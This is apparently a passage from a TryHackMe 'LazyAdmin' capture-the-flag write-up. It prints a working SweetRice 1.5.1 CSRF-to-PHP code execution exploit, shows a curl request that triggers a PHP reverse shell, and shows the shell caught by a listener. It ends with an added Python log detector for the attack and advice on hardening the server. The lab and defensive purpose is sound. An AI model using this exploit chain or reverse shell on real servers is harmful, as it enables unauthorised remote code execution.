PHP Remote Code Execution


┌──(kali㉿kali)-[~/archive/thm/lazyadmin]
└─$ searchsploit -m php/webapps/40700.html
  Exploit: SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution
      URL: https://www.exploit-db.com/exploits/40700
     Path: /usr/share/exploitdb/exploits/php/webapps/40700.html
    Codes: N/A
 Verified: True
File Type: HTML document, ASCII text
Copied to: /home/kali/archive/thm/lazyadmin/40700.html

Copying the exploit package to the current working directory

┌──(kali㉿kali)-[~/archive/thm/lazyadmin]
└─$ cat 40700.html          
<!--
# Exploit Title: SweetRice 1.5.1 Arbitrary Code Execution
# Date: 30-11-2016
# Exploit Author: Ashiyane Digital Security Team
# Vendor Homepage: http://www.basic-cms.org/
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
# Version: 1.5.1
 
 
# Description :
 
# In SweetRice CMS Panel In Adding Ads Section SweetRice Allow To Admin Add
PHP Codes In Ads File
# A CSRF Vulnerabilty In Adding Ads Section Allow To Attacker To Execute
PHP Codes On Server .
# In This Exploit I Just Added a echo '<h1> Hacked </h1>'; phpinfo();
Code You Can
Customize Exploit For Your Self .
 
# Exploit :
-->
 
<html>
<body onload="document.exploit.submit();">
<form action="http://localhost/sweetrice/as/?type=ad&mode=save" method="POST" name="exploit">
<input type="hidden" name="adk" value="hacked"/>
<textarea type="hidden" name="adv">
<?php
echo '<h1> Hacked </h1>';
phpinfo();?>
&lt;/textarea&gt;
</form>
</body>
</html>
 
<!--
# After HTML File Executed You Can Access Page In
http://localhost/sweetrice/inc/ads/hacked.php
  -->

It would appear that I can get code execution through the Ads section

Creating an ad that contains the PHP reverse shell

┌──(kali㉿kali)-[~/archive/thm/lazyadmin]
└─$ curl http://$IP/content/inc/ads/revshell.php

Triggering the PHP reverse shell

┌──(kali㉿kali)-[~/archive/thm/lazyadmin]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.9.2.95] from (UNKNOWN) [10.10.187.138] 32872
SOCKET: Shell has connected! PID: 2618
whoami
www-data
hostname
THM-Chal
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 02:57:61:3f:5d:e9 brd ff:ff:ff:ff:ff:ff
    inet 10.10.187.138/16 brd 10.10.255.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::57:61ff:fe3f:5de9/64 scope link 
       valid_lft forever preferred_lft forever

Initial foothold established on the target system as the www-data account by exploiting the ads feature in SweetRice 1.5.1
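From the defender's side, the chain above leaves a distinctive trace in the web server access log: a POST to the ad editor (`/as/?type=ad&mode=save`) driven from a foreign page, followed by a request for a freshly written `.php` under `inc/ads/`. The script below is an added example, not part of the original writeup or of SweetRice, that flags that sequence over constructed Apache combined-format lines; the hostnames, IPs, `site_host` value and `/content/` prefix are assumptions, and the Referer check is only a heuristic (the header can be stripped or absent, and a legitimate admin saving an ad will not trip it).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample Apache combined-format lines (not taken from the writeup or a real target).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /content/as/?type=ad HTTP/1.1" 200 512 "http://10.0.0.1/content/as/" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "POST /content/as/?type=ad&mode=save HTTP/1.1" 200 87 "http://attacker.example/40700.html" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /content/inc/ads/revshell.php HTTP/1.1" 200 0 "-" "curl/7.88.1"
10.0.0.9 - - [01/Jan/2024:10:05:00 +0000] "GET /content/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_ad_save(rec):
    """POST to the SweetRice ad editor with type=ad&mode=save, i.e. an ad file being written to disk."""
    u = urlsplit(rec["url"])
    q = parse_qs(u.query)
    return rec["method"] == "POST" and u.path.endswith("/as/") \
        and q.get("type") == ["ad"] and q.get("mode") == ["save"]

def is_ad_php(rec):
    """Request for a PHP file under inc/ads/, the directory where saved ads land as <name>.php."""
    return re.search(r"/inc/ads/[^/?]+\.php$", urlsplit(rec["url"]).path) is not None

def detect(log_text, site_host="10.0.0.1"):
    findings = []
    saves_seen = 0
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if is_ad_save(rec):
            saves_seen += 1
            ref_host = urlsplit(rec["referer"]).hostname
            if ref_host != site_host:  # save submitted from a foreign or missing Referer: CSRF signature
                findings.append(("csrf-suspect-ad-save", rec["ip"], rec["referer"]))
        elif is_ad_php(rec):
            sev = "ad-php-exec-after-save" if saves_seen else "ad-php-request"
            findings.append((sev, rec["ip"], rec["url"]))
    return findings

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f)
```

Serving `inc/ads/` with PHP execution disabled (or never writing attacker-supplied content into a `.php` file at all) removes the second half of the chain regardless of whether the CSRF is caught.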